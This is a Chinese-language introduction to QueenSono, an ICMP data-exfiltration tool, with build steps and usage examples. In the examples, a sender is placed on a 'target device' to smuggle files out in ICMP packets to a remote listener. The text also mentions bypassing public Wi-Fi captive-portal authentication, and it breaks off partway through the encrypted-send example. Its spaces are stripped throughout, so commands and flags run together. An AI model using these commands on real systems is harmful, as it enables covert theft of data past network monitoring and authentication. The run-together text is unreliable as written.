关于QueenSonoQueenSono是一款针对ICMP协议的数据提取工具。本工具基于Golang开发,仅依靠不监听ICMP协议实现功能。除此之外,该工具还可以用于基本的ICMP检查,或者绕过某些身份验证机制,例如许多公共Wi-Fi用于在连接到Wi-Fi(例如机场Wi-Fi)后对用户进行身份验证。认证。工具安装从源码安装:研究人员可以直接使用如下命令将项目源码克隆到本地,安装工具需要的依赖组件:gitclonehttps://github.com/ariary/QueenSono.gitmakebefore.build以下命令可以构建ICMP数据包发送器-qssender:build.queensono-sender以下命令可以构建ICMP数据包接收器-qsreceiver:build.queensono-receiver工具使用ICMP数据包发送器-qssender将负责发送ICMP数据包给监听器,所以我们需要将qssender源代码传输到目标设备。ICMPpacketreceiver-qsreceiver是我们本地设备上的数据包监听器。所有命令和工具参数都可以使用“--help”查看。(一)工具使用示例1:发送带“ACK”的数据包l0.0.0.0-p-freceived_bible.txt参数说明:-l0.0.0.0:监听所有接口的ICMP数据包-freceived_bible.txt:存储接收数据到文件-p:显示接收数据的进度条在目标设备上,运行以下命令:$wgethttps://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt#downloadahugefile(fortheexample)$qssendersendfile-d2-l127.0.0.1-r10.0.0.92-s50000bible.txt参数说明:发送文件:发送文件-d2:每两秒发送一个数据包-l127.0.0.1:每次接收回复信息的监听地址-r10.0.0.92:运行qsreceiver监听的远程设备地址-s50000:每个数据包要发送的数据量(二)工具使用示例2:发送包做不携带“ACK”发送数据:在本地设备上,运行以下命令:$qsreceiverreceivetruncated1-l0.0.0.0参数说明:receivetruncated1:如果没有receiving所有数据包,不会在目标设备上无限等待,运行如下命令:$qssendersend"thisisatestiwanttosendastringw/owaitingfortheechoreply"-d1-l127.0.0.1-r10.0.0.190-s1-N参数说明:-N:无回复选项(3)工具使用示例3:发送加密数据在这个例子中,我们将发送加密消息。由于命令行可能被监听,我们将使用非对称加密(防止密钥泄露):在本地设备上,运行以下命令:$qsreceiverreceive-l0.0.0.0--encrypt
